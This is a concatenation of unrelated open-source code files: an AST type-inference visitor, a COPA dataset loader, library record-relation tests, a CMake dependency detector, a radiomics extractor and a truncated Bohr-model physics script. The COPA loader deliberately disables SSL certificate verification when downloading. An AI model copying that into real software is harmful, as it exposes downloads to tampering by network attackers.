else:
self.context.define_variable(variable_name, None)
return node
def visit_Return(self, node):
if not isinstance(node.value, ast.Name):
return node
name = node.value.id
if name in self.context.incomplete_variables:
ann_node = self.context.incomplete_variables.pop(name)[1]
ann_node.annotation = self.returns
self.context.define_variable(name, None)
return node
def visit_For(self, node):
ForLoopTargetVisitor(self.context).visit(node.target)
for i, item in enumerate(node.body):
node.body[i] = self.visit(item)
return node
def visit_Call(self, node):
if isinstance(node.func, ast.Attribute):
if isinstance(node.func.value, ast.Name):
name = node.func.value.id
if name in self.context.incomplete_variables:
ann_node = self.context.incomplete_variables[name][1]
if isinstance(ann_node.annotation, ast.List):
if node.func.attr == 'append':
if len(node.args) == 1:
type_node = self.get_type(node.args[0])
if type_node is not None:
ann_node.annotation.elts[0] = type_node
self.context.incomplete_variables.pop(name)
self.context.define_variable(name, None)
elif node.func.attr == 'extend':
if len(node.args) == 1:
type_node = self.get_type(node.args[0])
if type_node is not None:
ann_node.annotation = type_node
self.context.incomplete_variables.pop(name)
self.context.define_variable(name, None)
return node
def get_type(self, node):
return TypeVisitor(self).visit(node)
def visit_FunctionDef(self, node):
self.context = Context(self.module_definitions, self.definitions)
for arg in node.args.args:
if arg.arg != 'self':
self.context.define_variable(arg.arg, None)
self.returns = node.returns
for i, item in enumerate(node.body):
node.body[i] = self.visit(item)
for assign_node, _ in self.context.incomplete_variables.values():
raise CompileError('cannot infer variable type', assign_node)
self.context = None
return node
class ForLoopTargetVisitor(ast.NodeVisitor):
def __init__(self, context):
self.context = context
def visit_Name(self, node):
self.context.define_variable(node.id, None)
| 2.515625
| 3
|
itrain/ext/datasets/copa.py
|
qpoiPeng/efficient-task-transfer
| 11
|
12777957
|
<gh_stars>10-100
import os
import urllib.request
from xml.dom import minidom
import datasets
import requests
_CITATION = """\
@inproceedings{roemmele2011choice,
title={Choice of Plausible Alternatives: An Evaluation of Commonsense Causal Reasoning.},
author={<NAME> and <NAME> and <NAME>},
booktitle={AAAI spring symposium: logical formalizations of commonsense reasoning},
pages={90--95},
year={2011}
}
"""
_DESCRIPTION = """\
The Choice Of Plausible Alternatives (COPA) evaluation provides researchers with a tool for assessing progress in open-domain commonsense causal reasoning. COPA consists of 1000 questions, split equally into development and test sets of 500 questions each. Each question is composed of a premise and two alternatives, where the task is to select the alternative that more plausibly has a causal relation with the premise. The correct alternative is randomized so that the expected performance of randomly guessing is 50%.
"""
_DOWNLOAD_URL = "https://people.ict.usc.edu/~gordon/downloads/COPA-resources.tgz"
class COPA(datasets.GeneratorBasedBuilder):
"""The Choice Of Plausible Alternatives (COPA) dataset."""
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("string"),
"premise": datasets.Value("string"),
"alternative1": datasets.Value("string"),
"alternative2": datasets.Value("string"),
"relation": datasets.Value("string"),
"label": datasets.Value("string"),
}
),
supervised_keys=None,
homepage="https://people.ict.usc.edu/~gordon/copa.html",
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
def _download(src_url, dst_path):
# ignore SSL certificate verification during download
response = requests.get(src_url, stream=True, verify=False)
with open(dst_path, "wb") as f:
for data in response.iter_content():
f.write(data)
return dst_path
dl_dir = dl_manager.extract(dl_manager.download_custom(_DOWNLOAD_URL, _download))
data_dir = os.path.join(dl_dir, "COPA-resources", "datasets")
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={"filepath": os.path.join(data_dir, "copa-dev.xml")},
),
datasets.SplitGenerator(
name=datasets.Split.TEST,
gen_kwargs={"filepath": os.path.join(data_dir, "copa-test.xml")},
),
]
def _generate_examples(self, filepath):
data = minidom.parse(filepath)
items = data.getElementsByTagName("item")
for item in items:
index = item.attributes["id"].value
yield index, {
"id": index,
"premise": item.getElementsByTagName("p")[0].firstChild.data,
"alternative1": item.getElementsByTagName("a1")[0].firstChild.data,
"alternative2": item.getElementsByTagName("a2")[0].firstChild.data,
"relation": item.attributes["asks-for"].value,
"label": item.attributes["most-plausible-alternative"].value,
}
| 2.640625
| 3
|
tests/api/ils/records_relations/test_records_relations_siblings.py
|
topless/invenio-app-ils
| 0
|
12777958
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test records relations siblings."""
import json
from flask import url_for
from invenio_app_ils.documents.api import Document
from tests.helpers import get_test_record, user_login
from .helpers import (recrel_assert_record_relations,
recrel_choose_endpoints_and_do_request)
def _test_sibl_language_relation(client, json_headers):
"""Test creation/deletion siblings language relations."""
first_pid_value = "docid-1"
first_pid_type = "docid"
second_pid_value = "docid-2"
second_pid_type = "docid"
third_pid_value = "docid-6"
third_pid_type = "docid"
relation_type = "language"
payload = [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": relation_type,
},
]
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec3 = Document.get_record_by_pid(third_pid_value)
rec3 = rec3.replace_refs()
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"language": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec2["title"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec3["title"],
"document_type": rec3["document_type"],
"languages": rec3["languages"],
"publication_year": rec3["publication_year"],
},
},
]
}
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"language": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
},
{
"pid_value": third_pid_value,
"pid_type": third_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec3["title"],
"languages": rec3["languages"],
"document_type": rec3["document_type"],
"publication_year": rec3["publication_year"],
},
},
]
}
},
)
recrel_assert_record_relations(
rec3,
expected={
"relations": {
"language": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
},
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "language",
"record_metadata": {
"title": rec2["title"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
},
]
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec3 = Document.get_record_by_pid(third_pid_value)
rec3 = rec3.replace_refs()
recrel_assert_record_relations(rec1, expected={"relations": {}})
recrel_assert_record_relations(rec2, expected={"relations": {}})
recrel_assert_record_relations(rec3, expected={"relations": {}})
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
def _test_sibl_edition_relation(client, json_headers, testdata):
"""Test creation/deletion siblings edition relations."""
first_pid_value = "docid-3"
first_pid_type = "docid"
second_pid_value = "docid-1"
second_pid_type = "docid"
relation_type = "edition"
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
}
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"edition": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": "edition",
"record_metadata": {
"title": rec2["title"],
"edition": rec2["edition"],
"languages": rec2["languages"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
}
]
}
},
)
rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"relation_type": "edition",
"record_metadata": {
"title": rec1["title"],
"edition": rec1["edition"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
}
],
"language": [
{
"pid_value": rec_docid_2["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_2["title"],
"languages": rec_docid_2["languages"],
"document_type": rec_docid_2["document_type"],
"publication_year": rec_docid_2[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6['languages'],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
],
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
recrel_assert_record_relations(rec1, expected={"relations": {}})
rec_docid_2 = get_test_record(testdata, "documents", "docid-2")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"language": [
{
"pid_value": rec_docid_2["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_2["title"],
"languages": rec_docid_2["languages"],
"document_type": rec_docid_2["document_type"],
"publication_year": rec_docid_2[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
]
}
},
)
def _test_empty_edition_field():
edition_first_pid_value = "docid-11"
edition_first_pid_type = "docid"
edition_second_pid_value = "docid-12"
edition_second_pid_type = "docid"
create_payload = {
"pid_value": edition_second_pid_value,
"pid_type": edition_second_pid_type,
"relation_type": relation_type,
}
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
edition_first_pid_value,
edition_first_pid_type,
edition_second_pid_value,
edition_second_pid_type,
),
create_payload,
expect_status_code=400
)
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
_test_empty_edition_field()
def _test_sibl_other_relation(client, json_headers, testdata):
"""Test creation/deletion siblings other relations."""
first_pid_value = "docid-2"
first_pid_type = "docid"
second_pid_value = "docid-3"
second_pid_type = "docid"
relation_type = "other"
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
"note": "exercise",
}
def _test_create():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "POST"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec1,
expected={
"relations_extra_metadata": {
"other": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"note": "exercise",
}
]
},
"relations": {
"language": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
],
"other": [
{
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"note": "exercise",
"relation_type": "other",
"record_metadata": {
"title": rec2["title"],
"edition": rec2["edition"],
"document_type": rec2["document_type"],
"publication_year": rec2["publication_year"],
},
}
],
},
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "edition",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
}
],
"other": [
{
"pid_value": first_pid_value,
"pid_type": first_pid_type,
"note": "exercise",
"relation_type": "other",
"record_metadata": {
"title": rec1["title"],
"languages": rec1["languages"],
"document_type": rec1["document_type"],
"publication_year": rec1["publication_year"],
},
}
],
}
},
)
def _test_delete():
"""Test relation creation."""
rec1, rec2 = recrel_choose_endpoints_and_do_request(
(client, json_headers, "DELETE"),
(
first_pid_value,
first_pid_type,
second_pid_value,
second_pid_type,
),
payload,
)
rec_docid_1 = get_test_record(testdata, "documents", "docid-1")
rec_docid_6 = get_test_record(testdata, "documents", "docid-6")
recrel_assert_record_relations(
rec1,
expected={
"relations": {
"language": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
},
{
"pid_value": rec_docid_6["pid"],
"pid_type": "docid",
"relation_type": "language",
"record_metadata": {
"title": rec_docid_6["title"],
"document_type": rec_docid_6["document_type"],
"languages": rec_docid_6["languages"],
"publication_year": rec_docid_6[
"publication_year"
],
},
},
]
}
},
)
recrel_assert_record_relations(
rec2,
expected={
"relations": {
"edition": [
{
"pid_value": rec_docid_1["pid"],
"pid_type": "docid",
"relation_type": "edition",
"record_metadata": {
"title": rec_docid_1["title"],
"edition": rec_docid_1["edition"],
"languages": rec_docid_1["languages"],
"document_type": rec_docid_1["document_type"],
"publication_year": rec_docid_1[
"publication_year"
],
},
}
]
}
},
)
_test_create()
_test_delete()
# recreate for the next one, to have some more valuable test data
_test_create()
def _test_sibl_invalid_relations_should_fail(
client, json_headers, invalids, status_code=400
):
"""Test relation creation with invalid siblings should fail."""
api_endpoint_documents = "invenio_app_ils_relations.docid_relations"
api_endpoint_series = "invenio_app_ils_relations.serid_relations"
for invalid in invalids:
first_pid_value = invalid["first_pid_value"]
first_pid_type = invalid["first_pid_type"]
second_pid_value = invalid["second_pid_value"]
second_pid_type = invalid["second_pid_type"]
relation_type = invalid["relation_type"]
api_endpoint = (
api_endpoint_documents
if first_pid_type == "docid"
else api_endpoint_series
)
url = url_for(api_endpoint, pid_value=first_pid_value)
payload = {
"pid_value": second_pid_value,
"pid_type": second_pid_type,
"relation_type": relation_type,
}
res = client.post(url, headers=json_headers, data=json.dumps(payload))
assert res.status_code == status_code
if status_code == 400:
error = json.loads(res.data.decode("utf-8"))
assert "message" in error
assert first_pid_value in error["message"]
assert second_pid_value in error["message"]
def test_siblings_relations(client, json_headers, testdata, users):
"""Test siblings relations."""
# Only one test method, to speed up tests and avoid recreating testdata for
# each test. As a drawback, testdata is not cleaned between the steps, so
# do not change the order of execution of the following tests :)
_test_sibl_invalid_relations_should_fail(
client,
json_headers,
[
{
"first_pid_value": "docid-1",
"first_pid_type": "docid",
"second_pid_value": "docid-2",
"second_pid_type": "docid",
"relation_type": "language",
}
],
status_code=401,
)
user_login(client, "librarian", users)
# docid-1 --language--> docid-2 and docid-6
_test_sibl_language_relation(client, json_headers)
# docid-3 --edition--> docid-1
_test_sibl_edition_relation(client, json_headers, testdata)
# docid-2 --other--> docid-3
_test_sibl_other_relation(client, json_headers, testdata)
# test wrong relations
invalids = [
# different pid type
{
"first_pid_value": "docid-1",
"first_pid_type": "docid",
"second_pid_value": "serid-1",
"second_pid_type": "serid",
"relation_type": "language",
},
# invalid edition: document with serial
{
"first_pid_value": "serid-3",
"first_pid_type": "serid",
"second_pid_value": "docid-5",
"second_pid_type": "docid",
"relation_type": "edition",
},
# different pid type
{
"first_pid_value": "serid-1",
"first_pid_type": "serid",
"second_pid_value": "docid-1",
"second_pid_type": "docid",
"relation_type": "other",
},
# same record
{
"first_pid_value": "docid-6",
"first_pid_type": "docid",
"second_pid_value": "docid-6",
"second_pid_type": "docid",
"relation_type": "language",
},
]
_test_sibl_invalid_relations_should_fail(client, json_headers, invalids)
| 1.898438
| 2
|
test/unit_tests_bible_yaml_downloader.py
|
daniel-tran/meaningless
| 0
|
12777959
|
<gh_stars>0
import unittest
import sys
sys.path.append('../')
from meaningless import YAMLDownloader, yaml_file_interface
# These tests only cover the components that differ from the base downloader
class UnitTests(unittest.TestCase):
# Note: Tests will only be run if they are prefixed with test_ in their method name.
# All other methods will simply be interpreted as test helper functions.
def test_yaml_downloader_settings(self):
bible = YAMLDownloader()
self.assertEqual(bible.file_extension, '.yaml', 'Extension is incorrect')
self.assertEqual(bible.file_writing_function.__module__, yaml_file_interface.write.__module__,
'Module of writing function is incorrect')
self.assertEqual(bible.file_writing_function.__name__, yaml_file_interface.write.__name__,
'Name of writing function is incorrect')
if __name__ == "__main__":
unittest.main()
| 3
| 3
|
exporter/constants.py
|
KTOmega/Slack-Exporter
| 0
|
12777960
|
CONVERSATIONS_EXPORT_DIR = "conversations"
CONVERSATIONS_JSON_FILE = "conversations.json"
CONVERSATIONS_TYPES = "public_channel,private_channel,mpim,im"
CONTEXT_JSON_FILE = "metadata.json"
EMOJI_EXPORT_DIR = "emoji"
EMOJI_JSON_FILE = "emoji.json"
FILES_EXPORT_DIR = "files"
FILES_JSON_FILE = "files.json"
HISTORY_JSON_DIR = "history"
ITEM_COUNT_LIMIT = 1000
PINS_JSON_FILE = "pins.json"
REMINDERS_JSON_FILE = "reminders.json"
REPLIES_KEY = "$replies"
TEAM_EXPORT_DIR = "team"
TEAM_JSON_FILE = "team.json"
USERS_EXPORT_DIR = "users"
USERS_JSON_FILE = "users.json"
| 1.132813
| 1
|
Exercicios de Tuplas/ex075.py
|
ChristianSantos88/Python
| 1
|
12777961
|
'''
Write a program that reads four values from the keyboard and stores them in a tuple. At the end, show:
a) How many times the value 9 appeared;
b) In which position the first value 3 was entered;
c) Which numbers were even.
'''
num = tuple(int(input('Digite um valor: ')) for c in range(0, 4))
cont_nove = 0
pos_tres = 0
print(f'Números gerados: {num}')
if 9 in num:
print(f'O número 09 apareceu {num.count(9)} vez(es).')
if 3 in num:
pos_tres = num.index(3)
print(f'O número 03 aparece pela primeira vez na {pos_tres + 1}ª posição.')
print(f'Número(s) par(es) gerado(s): ', end='')
for n in num:
if n % 2 == 0:
print(n, end=' ')
| 4.03125
| 4
|
detect_system_deps.py
|
rbrich/xcik
| 11
|
12777962
|
<reponame>rbrich/xcik
#!/usr/bin/env python3
import sys
import yaml
import tempfile
import textwrap
from pathlib import Path
from subprocess import run, DEVNULL
script_dir = Path(__file__).parent
def debug(_msg):
pass
def parse_args():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('option', type=str, nargs='*',
help="Project option from conanfile.py that are set to True.")
ap.add_argument("-v", "--verbose", action="store_true",
help="Print generated CMakeLists.txt, cmake command-line and full output.")
args = ap.parse_args()
if args.verbose:
global debug
debug = lambda msg: print(msg)
return args.option
def requirements():
with open(script_dir.joinpath('conandata.yml'), newline='') as conandata:
return yaml.safe_load(conandata)['requirements']
def filtered_requirements(options):
for name, info in requirements().items():
if 'prereq' not in info or set(info['prereq']).intersection(set(options)):
yield name, info
def detect_deps(reqs):
cmake_name_to_sysopt = {info['cmake'].split('/')[0]
: f"system_{name}" if 'conan' in info else f"with_{name}"
for name, info in reqs}
items = ';'.join(info['cmake'] for _, info in reqs)
with tempfile.TemporaryDirectory() as tmp_dir:
# Convert the path to posix (forward slashes) even on Windows.
# Paths with backslashes are not supported by CMake.
custom_modules = '"' + str(script_dir.joinpath('cmake').as_posix()) + '"'
cml = textwrap.dedent("""
cmake_minimum_required(VERSION 3.13)
project(SystemPackageFinder CXX)
list(APPEND CMAKE_MODULE_PATH """ + custom_modules + """)
foreach (ITEM IN LISTS DEPS)
string(REPLACE "/" ";" ITEM ${ITEM})
list(GET ITEM 0 NAME)
list(GET ITEM 1 VERSION)
message(STATUS "Find ${NAME} ${VERSION}")
find_package(${NAME} ${VERSION})
if (${NAME}_FOUND)
message(NOTICE "FOUND ${NAME} ${${NAME}_VERSION}")
endif()
endforeach()
""")
debug(cml)
with open(tmp_dir + "/CMakeLists.txt", 'w') as f:
f.write(cml)
# Prefer ninja if available. Needed to allow choice, otherwise `make` installation
# would be required on unixes, as it's the default in cmake.
ninja = ""
if run("command -v ninja", shell=True, stdout=DEVNULL, stderr=DEVNULL).returncode == 0:
ninja = "-G Ninja"
cmd = f"cmake . {ninja} -DDEPS='{items}'"
debug(cmd)
p = run(cmd, shell=True,
capture_output=True, encoding='UTF-8', cwd=tmp_dir)
debug(p.stdout)
if p.returncode != 0:
print(f'Failed:\n{p.stderr}', file=sys.stderr)
return
for line in p.stderr.splitlines():
if line.startswith('FOUND '):
_, name, version = line.split(' ')
print(f"Found: {name} {version}")
yield cmake_name_to_sysopt[name]
def main():
options = parse_args()
reqs = tuple(filtered_requirements(options))
deps = tuple(detect_deps(reqs))
print(' '.join(f'-DXCI_{o.upper()}=ON' for o in deps if o.startswith('with_')))
print(' '.join(f'-o xcikit:{o}=True' for o in deps))
if __name__ == '__main__':
main()
| 2.203125
| 2
|
mlrun/api/crud/__init__.py
|
katyakats/mlrun
| 0
|
12777963
|
<reponame>katyakats/mlrun<filename>mlrun/api/crud/__init__.py
from .artifacts import Artifacts # noqa: F401
from .feature_store import FeatureStore # noqa: F401
from .functions import Functions # noqa: F401
from .logs import Logs # noqa: F401
from .pipelines import Pipelines # noqa: F401
from .projects import Projects # noqa: F401
from .runs import Runs # noqa: F401
from .runtimes import Runtimes # noqa: F401
| 1.109375
| 1
|
output/models/nist_data/list_pkg/boolean/schema_instance/nistschema_sv_iv_list_boolean_pattern_3_xsd/__init__.py
|
tefra/xsdata-w3c-tests
| 1
|
12777964
|
<reponame>tefra/xsdata-w3c-tests
from output.models.nist_data.list_pkg.boolean.schema_instance.nistschema_sv_iv_list_boolean_pattern_3_xsd.nistschema_sv_iv_list_boolean_pattern_3 import NistschemaSvIvListBooleanPattern3
__all__ = [
"NistschemaSvIvListBooleanPattern3",
]
| 0.804688
| 1
|
problems/p019.py
|
10jmellott/ProjectEuler
| 0
|
12777965
|
<gh_stars>0
"""<a href="https://projecteuler.net/problem=19" class="title-custom-link">Counting Sundays</a>
You are given the following information, but you may prefer to do some research for yourself.
1 Jan 1900 was a Monday.
Thirty days has September,
April, June and November.
All the rest have thirty-one,
Saving February alone,
Which has twenty-eight, rain or shine.
And on leap years, twenty-nine.
A leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.
How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?
"""
def is_leap_year(year):
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def main():
"""Solves this problem
Incremented each day and checked from Jan 1st, 1900
(excluded any match in 1900 until 1901 was reached)
Used this for testing: [https://www.onthisday.com/](https://www.onthisday.com/)
Returns:
Integer: Solution to this problem
"""
# Set the arrays for days in a month
months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
months_ly = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    # Initialized using the data provided - 0-indexed day & month - so you add one to get the actual date
dow = 1
day = 0
month = 0
year = 1900
# Set the starting count to 0
count = 0
# Until we leave the 20th century
while year < 2001:
# determine months dataset
m = months
if is_leap_year(year):
m = months_ly
# Increment Count if applicable
if day == 0 and dow == 0:
if year > 1900:
count += 1
# Increment Day of Week
dow += 1
dow %= 7
        # Increment Day and carry over into month & year
day += 1
if day >= m[month]:
day = 0
month += 1
if month > 11:
month = 0
year += 1
return count
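# Usage sketch (illustrative, not part of the original solution): the module only
# defines main(); the repository's runner is expected to import and call it.
#
#   if __name__ == '__main__':
#       print(main())  # expected to print 171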
| 3.921875
| 4
|
src/radiomics_extractor.py
|
SCAN-NRAD/DL-DiReCT
| 12
|
12777966
|
import argparse
import os
import sys
import radiomics
import SimpleITK as sitk
import csv
import pandas as pd
LABELS_FS = ['Left-Lateral-Ventricle', 'Left-Inf-Lat-Vent', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', '3rd-Ventricle',
'4th-Ventricle', 'Brain-Stem', 'Left-Hippocampus', 'Left-Amygdala', 'Left-Accumbens-area', 'Left-VentralDC', 'Left-choroid-plexus',
'Right-Lateral-Ventricle', 'Right-Inf-Lat-Vent', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen', 'Right-Pallidum', 'Right-Hippocampus',
'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Right-choroid-plexus', '5th-Ventricle',
'CC_Posterior', 'CC_Mid_Posterior', 'CC_Central', 'CC_Mid_Anterior', 'CC_Anterior']
LABELS_DL = ['Left-Ventricle-all:101', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', 'Left-Hippocampus', 'Left-Amygdala',
'Left-Accumbens-area', 'Left-VentralDC', 'Right-Ventricle-all:112', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen',
'Right-Pallidum', 'Right-Hippocampus', 'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Brain-Stem',
'3rd-Ventricle', '4th-Ventricle', 'Corpus-Callosum:125']
def lut_parse():
lut = pd.read_csv('{}/fs_lut.csv'.format(os.path.dirname(os.path.realpath(sys.argv[0]))))
lut = dict(zip(lut.Key, lut.Label))
return lut
def main(subject_dirs, aseg_file, labels, results_csv):
LUT = lut_parse()
print(results_csv)
with open(results_csv, 'w') as out_file:
writer = csv.writer(out_file, delimiter=',')
header = None
for subjects_dir in subject_dirs:
for subject_name in os.listdir(subjects_dir):
fname = '{}/{}/{}'.format(subjects_dir, subject_name, aseg_file)
if not os.path.exists(fname):
print('{}: {} not found. Skipping'.format(subject_name, aseg_file))
continue
print(subject_name)
fields = list()
values = list()
img = sitk.ReadImage(fname)
for label in labels:
if ':' in label:
label, label_id = label.split(':')
else:
label_id = LUT[label]
radiomics.setVerbosity(50)
shape_features = radiomics.shape.RadiomicsShape(img, img, **{'label': int(label_id)})
shape_features.enableAllFeatures()
results = shape_features.execute()
for key in results.keys():
fields.append('{}.{}'.format(label, key))
values.append(float(results[key]) if results['VoxelVolume'] > 0 else 'nan')
if header is None:
header = fields
writer.writerow(['Subject'] + header)
else:
assert header == fields
writer.writerow([subject_name] + values)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Extract radiomics features from subjects')
parser.add_argument(
'--aseg_file',
type=str,
default='T1w_norm_seg.nii.gz',
help='Path (relative to subject dir) of aseg segmentation file.'
)
parser.add_argument(
'--labels',
type=str,
nargs='+',
metavar='label',
default=['DL'],
help='List of labels. FreeSurfer ids (from fs_lut) are used per default. '
'Can also be: label:id. Example: "Left-Hippocampus:9 Right-Hippocampus:21." '
'Use "FS" for all FreeSurfer labels or "DL" for all DL+DiReCT labels'
)
parser.add_argument(
'--results_csv',
type=str,
required=True,
help='CSV-File to store results'
)
parser.add_argument(
'subject_dirs',
metavar='dir',
type=str,
nargs='+',
help='Directories with subjects (FreeSurfer or DL+DiReCT results dir)'
)
args = parser.parse_args()
    for subjects_dir in args.subject_dirs:
        if not os.path.exists(subjects_dir):
            print('{} not found'.format(subjects_dir))
            sys.exit(1)
labels = LABELS_FS if args.labels[0] == 'FS' else LABELS_DL if args.labels[0] == 'DL' else args.labels
main(args.subject_dirs, args.aseg_file, labels, args.results_csv)
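# Example invocation (illustrative; the paths below are placeholders):
#   python radiomics_extractor.py --results_csv shape_features.csv /data/dl_direct_subjects
# uses the default DL+DiReCT label set and the T1w_norm_seg.nii.gz segmentation per subject.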
| 1.820313
| 2
|
New folder/project_BSW.py
|
bswood9321/PHYS-3210
| 0
|
12777967
|
<filename>New folder/project_BSW.py
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 11 22:17:26 2019
@author: Brandon
"""
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
e0=8.8541878128e-12
echarge=1.60217662e-19
hbar=1.0545718e-34
me=9.10938356e-31
a0=5.29177210903e-11
c=299792458
h=6.6260693e-34
def r(n):
rn=(4*np.pi*e0*(hbar**2)*n**2)/(me*(echarge**2))
return rn/a0
def v(n):
vn=hbar/(me*a0*n)
return vn
def p(n):
pn=hbar/(a0*n)
return pn/1e-24
def E(n):
En=-((me*(echarge**4))/(32*(np.pi**2)*(e0**2)*(hbar**2)))*(1/(n**2))
En=En*6.242e18
return En
def delE(m,n):
delE=np.absolute(E(m)-E(n))
return delE
def photonwavel(delE):
l=h*c/(delE*1.60218e-19)
return l
def photonfreq(l):
f=c/l
return f
def Zr(z,n):
Zr=(4*np.pi*e0*(hbar**2)*n**2)/(me*z*(echarge**2))
return Zr
def Ze(z,n):
Zn=-((me*(z**2)*(echarge**4))/(32*(np.pi**2)*(e0**2)*(hbar**2)))*(1/(n**2))
Zn=Zn*6.242e18
return Zn
def delZe(z,m,n):
delZe=np.absolute(Ze(z,m)-Ze(z,n))
return delZe
def prob_1s(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
